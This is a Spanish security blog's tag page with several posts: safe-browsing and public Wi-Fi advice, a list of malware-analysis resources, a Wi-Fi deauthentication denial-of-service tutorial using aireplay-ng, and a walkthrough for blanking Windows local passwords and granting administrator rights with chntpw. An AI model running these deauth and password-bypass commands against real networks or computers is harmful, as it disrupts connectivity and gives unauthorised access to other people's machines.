Mostrando las entradas con la etiqueta Back Track. Mostrar todas las entradas
Mostrando las entradas con la etiqueta Back Track. Mostrar todas las entradas

2014/01/14

Mis primeros pasos para convertirme en un internauta seguro

¿Quieres estar seguro en Internet y no sabes por dónde empezar? No te preocupes, la Oficina de Seguridad del Internauta te proporciona toda la información y ayuda necesaria para disfrutar de la Red con garantías.
Convertirse en un internauta que navega seguro es posible siguiendo unas sencillas recomendaciones como estar informado, tener unos buenos hábitos de uso y proteger el sistema adecuadamente. No te preocupes, es más sencillo de lo que piensas.

 

PARA EMPEZAR... CONOCE LOS RIESGOS

¿Sabes a qué te enfrentas en Internet? Ponte al día. La mejor forma para empezar a combatir los peligros es conocerlos.
Tienes que tener mucha precaución con los fraudes basados en la «ingeniería social», una técnica de engaño muy utilizada por los delincuentes para tratar de dirigir la conducta de una persona y obtener información sensible de ella –correo electrónico, teléfono, contraseñas, datos bancarios, etc.-.
No olvides proteger tu privacidad. Los servicios actuales de Internet facilitan las relaciones sociales, lo que conlleva a su vez que publiques mucha información sobre ti (datos personales, imágenes, preferencias, etc.). Dado el valor que tiene esta información, y las repercusiones negativas que puede tener su uso inadecuado por terceros, es necesario que la gestiones adecuadamente. ¡Piensa antes de publicar y controla qué información compartes!
 Conoce los riesgos 
Para evaluar tu percepción sobre los riesgos de Internet, te proponemos que realiaces el «Test de Conocimientos»
Por último, recordarte que las amenazas en Internet no son siempre las mismas, los fraudes y técnicas de engaño evolucionan, por lo que también se hace necesario mantenerse al día. Te aconsejamos que te suscribas a los RSS o a los boletines de correo de la OSI que incluyen los últimos avances de actualidad. ¡Estarás más al día! y ¡protegido!

 

PROTÉGETE EN INTERNET

Una vez que conoces los riesgos a los que te enfrentas, es hora de protegerte, y la mejor manera para hacerlo es la prevención.
  • Protege tu ordenador en 3 pasos
    • Utiliza un antivirus que analice todo lo que descargas. Asegúrate de tener un antivirus instalado en el PC, mantenlo actualizado al día para que reconozca el mayor número de virus, y realiza análisis regularmente de todo el sistema. En la sección de Útiles de la OSI puedes encontrar soluciones antivirus gratuitas.
    • Mantén el sistema operativo (SO) y el navegador actualizado. Los virus aprovechan los agujeros del SO y navegador para infectar tu PC. Como contramedida los fabricantes corrigen los programas a través de actualizaciones. Para estar seguro de que estás protegido a la última activa las actualizaciones automáticas de tu SO, navegador, plugins del navegador y resto de aplicaciones. Herramientas como CONANSecunia te ayudarán a detectar el software obsoleto. Para más información visita la sección de actualizaciones de la OSI.
    • Utiliza una cuenta de usuario con permisos limitados para navegar. Evita que los virus puedan manipular tu PC utilizando una cuenta de usuario apropiada. La cuenta de administrador es sólo para momentos puntuales. Encontrarás más información en la sección de cuentas de usuario de la OSI.
    Protege tu PC
  • Protégete mientras navegas - ¡Utiliza el sentido común!
    • Confía en la web pero no seas ingenuo. Permanece alerta, no todo lo que se dice en Internet tiene por qué ser cierto. Ante la duda contrasta la información en otras fuentes.
    • No hagas clic en enlaces que resulten sospechosos. Sé precavido antes de seguir un enlace al navegar, en el correo, en la mensajería instantánea o en una red social. Los mensajes falsos que los acompañan pueden ser muy convincentes con el fin de captar tu atención y redirigirte a páginas maliciosas.
    • Ten cuidado con lo que descargas. No te precipites y bajes cualquier cosa, nuevas amenazas surgen cada día y los antivirus no pueden combatirlas todas. Descarga los ficheros solo de fuentes confiables y los programas desde sus páginas oficiales, así evitaras desagradables sorpresas.
    • Desconfía de los correos de remitentes desconocidos. Ante la duda, es recomendable no responder a los mismos y eliminarlos. Ten en cuenta también que cuanto más limites la difusión de tu cuenta de correo menos spam recibirás.
    • No abras ficheros adjuntos sospechosos. Si es de un conocido y no lo has solicitado, asegúrate de que realmente te lo quiso enviar. Los virus utilizan esta técnica para propagarse entre los contactos del correo, así como los contactos de la mensajería instantánea y de las redes sociales.
    • Cuida tus contraseñas. Al introducirlas asegúrate de que estás en la página correcta ya que puede parecer idéntica a la legítima y tratarse de una suplantación. No utilices la misma contraseña en diferentes servicios por que si acceden a una de tus cuentas fácilmente podrán acceder al resto. Y no compartas tus contraseñas con nadie, aunque digan que son del servicio técnico, no lo hagas, los servicios respetables nunca te solicitarán las contraseñas por propia iniciativa.
    • Piensa antes de publicar. Presta especial atención a la información personal que difundes. Valora qué información podría ser utilizada en tu contra en el futuro.
    Protegete mientras navegas
Aunque éstas son las principales recomendaciones a tener en cuenta para empezar a disfrutar de Internet de una manera segura puedes encontrar información más detallada y especifica en «Protégete en Internet», «Protege tu ordenador», «Protege tu móvil y portátil» y «Protege a los menores». Por otro lado, puedes ampliar tus conocimientos sobre esta temática, en el curso de Introducción a la protección en Internet de la plataforma de formación online de INTECO.

 

¿NECESITAS AYUDA?

Si piensas que tu sistema puede estar infectado por un virus, crees estar ante algún intento de fraude o simplemente tienes dudas sobre las recomendaciones antes vistas, ¡contácta con nosotros!. Puedes llamarnos al Centro de Atención Telefónica de la OSI.

 

DIFUNDE EL MENSAJE

Sólo es posible una Internet segura si la construimos entre todos. ¡La Seguridad TIC no está completa sin TI!
Ayúdanos a difundir el mensaje, comparte esta web con tus amigos, familiares, compañeros de trabajo… y entre todos:
¡Hagamos de Internet un lugar seguro!

2012/10/12

Qué debemos tener en cuenta al conectarnos a una Wi-Fi abierta

Afortunadamente, cada vez son más los establecimientos (cafeterías, restaurantes, centros comerciales, etc), aeropuertos y hoteles que ofrecen a sus clientes conexión Wi-Fi de manera gratuita (ya sea porque ofrezcan una conexión abierta o a través de un portal cautivo), una facilidad que nos viene muy bien para trabajar con nuestro ordenador o conectar nuestro smartphone o nuestra tableta sin tener que consumir el bono de datos que tengamos contratado.
hacker
Tanto en lugares públicos como en eventos a los que asistamos, disponer de una conexión Wi-Fi nos puede facilitar la conexión a nuestra cuenta de correo, a nuestro perfil en Facebook o Twitter o, incluso, conectarnos a nuestro blog para escribir un artículo; sin embargo, hacer ya un par de años, una extensión para Firefox llamada Firesheep nos hizo ver que a la hora de conectarnos a una red Wi-Fi compartida con otros usuarios debemos tomar una serie de precauciones.
¿Y qué hacía Firesheep? Para el que no recuerde este caso, Firesheep era una extensión para Firefox que capturaba el tráfico que se cursaba a través de una red Wi-Fi y era capaz “robar” las cookies de sesión de servicios tan populares como Amazon, Basecamp, Twitter o Facebook, permitiendo al atacante robar nuestra identidad y acceder a nuestra cuenta.
Con la idea de evitar este tipo de situaciones y no ponérselo nada fácil a aquellos que pretenden capturar contraseñas (con no muy buenas intenciones), no está demás tener en cuenta algunos aspectos básicos de seguridad que evitarán que nos llevemos algún disgusto, aspectos que giran alrededor de un denominador común: el uso de conexiones cifradas, es decir, el SSL.

Configurar el acceso vía SSL a nuestros perfiles sociales

Aunque deberían ofrecer por defecto conexiones cifradas (al igual que lo hace, por ejemplo, la banca electrónica y muchas tiendas online), servicios como Twitter, Facebook o LinkedIn no usan conexiones cifradas salvo que así se lo indiquemos en las opciones de configuración.
En un uso normal, a través de nuestro navegador, no vamos notar diferencia (en cuanto a tiempo de carga) entre una conexión cifrada o sin cifrar, por tanto, para estar siempre preparados para toda ocasión, es importante acceder a las opciones de configuración de este tipo de servicios y marcar el uso de SSL siempre (y así evitaremos los efectos de Firesheep y similares).

Cifrar la conexión a nuestro buzón de correo

Mi compañera Bárbara dedicó hoy unos minutos a hablarnos del correo electrónico y nos brindó algunos consejos para mantener nuestras cuentas seguras y, además de sus consejos, debemos añadir un detalle adicional si pensamos consultar nuestro correo electrónico a través de una red de uso público: usar también conexiones cifradas.
Seguridad SSL
La mayoría de servicios de correo electrónico que ofrecen un webmail a los usuarios (por ejemplo Gmail), por defecto, suelen estar bajo conexiones SSL (se accede a través de https), sin embargo, cuando configuramos la cuenta en Outlook o Thunderbird, no siempre se configura el buzón de manera segura y se recurre al protocolo POP o IMAP. ¿Y qué debemos hacer? Si vamos a usar nuestro correo en una red pública, si nuestro servidor de correo lo permite deberíamos configurar la cuenta usando conexiones seguras (IMAP-SSL o POP-SSL) además de enviar las contraseñas cifradas.

Recurrir a extensiones que fuercen el uso de conexiones cifradas

Si pensamos que configurar todos los servicios que usamos para que, por defecto, usen conexiones cifradas puede superarnos o que, incluso, puede que nos dejemos servicios fuera y sin configurar, una buena forma de mejorar la seguridad rápidamente puede ser recurrir a alguna extensión que nos ayude a mantener conexiones seguras de manera global.
Extensiones como KB SSL Enforcer, HTTPS Everywhere o Force-TLS se encargarán de servir los sitios web más populares (Twitter, Facebook, Amazon, Google, etc) en sus versiones bajo SSL (https).

Usar una VPN

Una manera de “aislar” nuestro tráfico y establecer un canal seguro de comunicación es mediante el uso de una VPN, con la que podremos establecer una conexión segura con nuestra empresa o contra un servicio determinado.
Este tipo de conexiones son cifradas (mediante IPsec) y cada paquete de datos que intercambiamos viaja cifrado hasta llegar a cada extremo del canal entre el emisor y el receptor, por tanto, un tercero no va a tener nada fácil interceptar nuestros datos, nuestra contraseña o robar las cookies de sesión de nuestra cuenta de Twitter.

Mejorar nuestros propios sistemas

Si administramos algún sistema o página web a la que, por ejemplo, accedamos de manera continuada desde todo tipo de redes quizás pueda ser interesante plantearnos el uso de conexiones SSL para evitar que alguien que esté a la escucha intercepte nuestras credenciales de acceso.
Muchos gestores de contenidos tienen disponibles módulos que fuerzan el uso de conexiones SSL al acceder a la zona de administración o determinadas zonas privadas que se consideran sensibles. En el caso que usemos WordPress extensiones como WordPress HTTPS, por ejemplo, nos pueden ayudar a establecer conexiones seguras con la zona de administración de nuestro blog y, de paso, también podremos proteger ciertas páginas especiales.

Fuente: http://bitelia.com

2012/04/16

Recopilatorio de recursos de análisis de malware de Claus Valca

Claus Valca del blog grand stream dreams ha publicado una interesante lista de recursos para análisis de malware. Este recopilatorio se complementa con otra de sus entradas y queríamos postearlo también aquí para tenerlo siempre a mano:


Escáners en línea y herramientas de análisis de Virus/Malware
Herramientas de análisis de ficheros PDF
Aunque no es para PDF el servicio Malware Tracker’s +Cryptam también puede escanear documentos "Office” en busca de contenidos maliciosos.
Herramientas Sandbox para el análisis de malware
Herramientas de análisis de Adobe Shockwave/Flash
Mandiant - en una palabra hará…
  • MANDIANT - Red Curtain - de su descripción del producto: "MRC examina los archivos ejecutables (por ejemplo, EXE, DLL, etc.). para determinar si son sospechosos basándose en un conjunto de criterios. Se examinan múltiples aspectos de un archivo ejecutable, tales como la entropía (en otras palabras, aleatorización), indicaciones de packing, compilador y firmas, la presencia de las firmas digitales y otras características para generar una puntuación de la amenaza. Esta puntuación se puede utilizar para identificar si un conjunto de archivos requiere mayor investigación."
  • MANDIANT Find Evil - herramienta de desensamblado para detectar ejecutables paquetizados
  • Comprueba Mandiant’s Free Software así como otras herramientas que pueden ayudar en la investigación de malware.
Lecciones aprendidas y conocimientos compartidos por los profesionales del análisis de malware
Gracias al duro trabajo y al espíritu comunitario de los analistas de malware, podemos aprender de sus aportes. Estos son algunos de los mejores lugares para empezar.

2012/03/09

[Ataque DoS Wireless] Denegación de Servicio a una Red Wi-fi

El objetivo de una Denegación de Servicio a una Red Wi-fi es dejar a los usuarios legítimos de una red Wi-fi sin poder acceder a Internet, esto se logra inundando con paquetes de deautenticación al punto de acceso y/o al cliente.

Cuando se quiere realizar un ataque DoS a una Red Wi-fi, se puede atacar de 2 formas, una es atacando al punto de acceso y dejar sin acceso a ningún cliente o atacando solamente a un cliente en específico.

0.- Preliminar:
Primero ponemos la tarjeta de red en modo monitor:
airmon-ng start wlan0
Revisamos el canal del Punto de acceso y ponemos en modo monitor en ese canal en específico:
airmon-ng -c 5 mon0
Donde 5 es el canal del punto de acceso y mon0 es la interfaz en modo monitor.

1.- DoS al punto de acceso:
 Con aireplay enviamos paquetes de deautenticación en un buncle infinito (-0 0) al Punto de acceso.
aireplay-ng -0 0 -a 99:99:99:99:99:99 mon0
Donde 99:99:99:99:99:99 es la mac del Punto de acceso.

 2.- DoS al Cliente:
 Con aireplay enviamos paquetes de deautenticación en un buncle infinito (-0 0) a un cliente en específico.
aireplay-ng -0 0 -a 99:99:99:99:99:99 -c 11:11:11:11:11:11 mon0
Donde 99:99:99:99:99:99 es la mac del Punto de acceso y 11:11:11:11:11:11 es la mac del Cliente.

Si esto no les pareció lo suficientemente fácil, Abdulla Aleid realizo un pequeño script que automatiza todo este proceso, pero es un poco más efectivo ya que envia solo 100 paquetes de deautenticación, pero con un loop infinito que sobrecarga aun más la red Wi-fi:


Demostración del funcionamiento del Script:




Fuente: http://www.blackploit.com

2012/01/27

Curso III. ChntPw Vs SAM

Los Viernes que ya todos estamos cansados me gusta variar un poco la temática de la semana, sobre todo si pasamos los días entre ips y mascaras de subred. En esta ocasión instalamos en un pendrive una distro de seguridad que personalmente me gusta mucho utilizar BackTrack 4R2.


Una vez instalado, decidimos probar un poco la seguridad física atacando la contraseña de los equipos, en entornos Windows (siempre referido a Usuario Local, no de Dominio), cuando lees como se trata de forzar de distintas maneras para obtener la contraseña te das cuenta que muchos ataques se hacen sin conocimiento del Sistema y esto es poco practico.

Realmente es mucho mas rápido y sencillo modificar el archivo SAM, del propio sistema para acceder al equipo, utilizando chntpw. Reiniciamos el Equipo para arrancar desde nuestra Live BackTrack 4R2.

Una vez en el Sistema se pasa al entorno gráfico con el comando StartX .

Hay varias opciones para montar los discos de la maquina objetivo, de forma gráfica o mediante el comando que puedes ver en la imagen .........mount -a /dev/hda1 /root/dd/
mount -a [ruta al disco][ruta a una carpeta creada para montar dicho disco]

En BT4R2 al acceder donde esta el ejecutable, el modo gráfico falla. (Hoy nos ocasiono bastantes problemas).
La ruta es /pentest/passwords/chntpw/

Desde esa ubicación tienes que ejecutar el comando e indicarle la ruta exacta para acceder al archivo SAM, que previamente habíamos montado. Recuerda para ejecutar comandos empezar por ./


./chntpw -i Ruta completa hasta el archivo SAM (configuracion de contraseñas).

Click para aumentar imagen.


El parámetro -l con la ruta completa nos mostrara todos los usuarios del sistema. Teclearemos el nombre del usuario que deseamos modificar.


Opciones
1 Dejar la contraseña en blanco (vacía).
2 No recomendable (cambiaría la contraseña).
3 Elevar los privilegios de ese Usuario (convertir en Administrador).
4 Activar una cuenta creada (pero que no este activa).

Todas estas opciones nos pedirán confirmación del nombre del Usuario, por defecto se aplicarían a la cuenta del administrador.


Una vez realizadas todas las modificaciones deseadas solo queda salir y guardar todos los cambios, la nueva configuracion del archivo SAM.


Ya tenemos nuestra cuenta activada, sin contraseña y con permisos de administrador, encendemos normalmente y a disfrutar de nuestro Windows !!!!